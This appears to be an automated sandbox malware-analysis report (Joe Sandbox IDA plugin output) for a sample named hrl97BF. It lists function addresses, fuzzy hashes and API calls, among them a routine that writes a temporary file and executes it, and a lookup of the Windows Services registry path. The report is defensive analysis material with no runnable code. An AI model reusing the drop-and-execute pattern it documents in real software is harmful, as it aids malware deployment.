Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction ID: 61c35c1a6ef796fb9a95b154365f1d274a12748536e75e316c168b2b6ba842ad
Opcode Fuzzy Hash: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction Fuzzy Hash: 0321D131244304ABE3249B14DD16B6BB7A9EB84B04F00093DF689A72D1CBB59A08879A

Function 00405980 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000F), ref: 00405A36
ExitThread.KERNEL32 ref: 00405A40

Strings

L8@, xrefs: 004059CF
:8@, xrefs: 004059E0
p8@, xrefs: 00405A02

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: ExitSleepThread
String ID: :8@$L8@$p8@
API String ID: 2532117645-1348165829
Opcode ID: 4ec5ed0947da0d90acb00254561b95d3ed25ab39c8d3cff82c102e6db47b881b
Instruction ID: 5552c68df3c5ec419ed120abdad0def72af0b1e7849d46ccb2dcea0349e472ec
Opcode Fuzzy Hash: 4ec5ed0947da0d90acb00254561b95d3ed25ab39c8d3cff82c102e6db47b881b
Instruction Fuzzy Hash: 45119030244304ABE324DB50DE4AB6B77E9EF85704F00092DF689B61D1DBF49D088B9B

Function 00402AD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402AF6
lstrcatA.KERNEL32(00000000,100200), ref: 00402B06

Strings

100200, xrefs: 00402B00
SYSTEM\CurrentControlSet\Services\, xrefs: 00402AE7
F7@, xrefs: 00402B22

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 100200$F7@$SYSTEM\CurrentControlSet\Services\
API String ID: 3905823039-3017750547
Opcode ID: 99f8f17f0a694f6518748ee4b6ac97a82841e6c45d2c058385b64cf9619508e7
Instruction ID: 81adf45cb320d8295d14ce0b174844155e5595c11b4d55a8e5ae176a8c1ac5a8
Opcode Fuzzy Hash: 99f8f17f0a694f6518748ee4b6ac97a82841e6c45d2c058385b64cf9619508e7
Instruction Fuzzy Hash: B5F08231248206BEE750D764DD05FAAB7A8ABD4700F108D3DB2C9A20E0D9B8915D8716

Function 00478729 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 0047874D

Part of subcall function 00478768: GetTempFileNameA.KERNEL32(?,00478764,00000000,?), ref: 00478769
Part of subcall function 00478768: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00478764,00000000,?), ref: 00478784
Part of subcall function 00478768: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00478764,00000000,?), ref: 004787B4
Part of subcall function 00478768: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00478764,00000000,?), ref: 004787C0
Part of subcall function 00478768: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00478764), ref: 004787E4

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: 818476e441276dc42d84f657b397e929fa4b9a4741cf0798d1270138581a510b
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: D721D5B1180306BFE7255A21CC8EFFF7B2CEF95B00F104519FA0A89181DBB55E158669

Function 7FE326DF Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE32703

Part of subcall function 7FE3271E: GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
Part of subcall function 7FE3271E: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
Part of subcall function 7FE3271E: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
Part of subcall function 7FE3271E: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
Part of subcall function 7FE3271E: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction ID: e8ff87219964215428be11df8a01d81b33858c950305ba854321610fda46bc39
Opcode Fuzzy Hash: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction Fuzzy Hash: 1621C3B1645306BFE7215B20CC4DFEB7B2CEF86711F404114F94689081E7B1AE15C6A6

Function 006F2768 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 006F278C

Part of subcall function 006F27A7: GetTempFileNameA.KERNEL32(?,006F27A3,00000000,?), ref: 006F27A8
Part of subcall function 006F27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,006F27A3,00000000,?), ref: 006F27C3
Part of subcall function 006F27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,006F27A3,00000000,?), ref: 006F27F3
Part of subcall function 006F27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,006F27A3,00000000,?), ref: 006F27FF
Part of subcall function 006F27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,006F27A3), ref: 006F2823

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: e5d6aa81c65bbb309d8522c2631df0a2cee08fc121a5904326f5cba85543753b
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: 8821D5B114420ABFE7215A20CC5EFFF3A2DEF95B10F000519FA4599181D7B19E158AB6

Function 00478768 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,00478764,00000000,?), ref: 00478769
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00478764,00000000,?), ref: 00478784
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00478764,00000000,?), ref: 004787B4
CloseHandle.KERNEL32(?,00000104,?,00000000,?,00478764,00000000,?), ref: 004787C0
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00478764), ref: 004787E4

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: f9384e7524f948391849e77edfd83035576d2aa7e9ef77b067fd291cb22e7d4d
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: EC1180B1140606BBEB250B21CC4EFFF7A2DEF94B11F10451DFA0A89080DBF59F5186A8

Function 7FE3271E Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction ID: 53811a8245002154d32b689494dec5e7fa63c0c5570ca99e0030f64d1e6d62be
Opcode Fuzzy Hash: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction Fuzzy Hash: C91161B1600605BFE7251B20CC4DFEB7A2CEF89B11F404518FA4698480EBF1AE1186A5

Function 006F27A7 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,006F27A3,00000000,?), ref: 006F27A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,006F27A3,00000000,?), ref: 006F27C3
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,006F27A3,00000000,?), ref: 006F27F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,006F27A3,00000000,?), ref: 006F27FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,006F27A3), ref: 006F2823

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
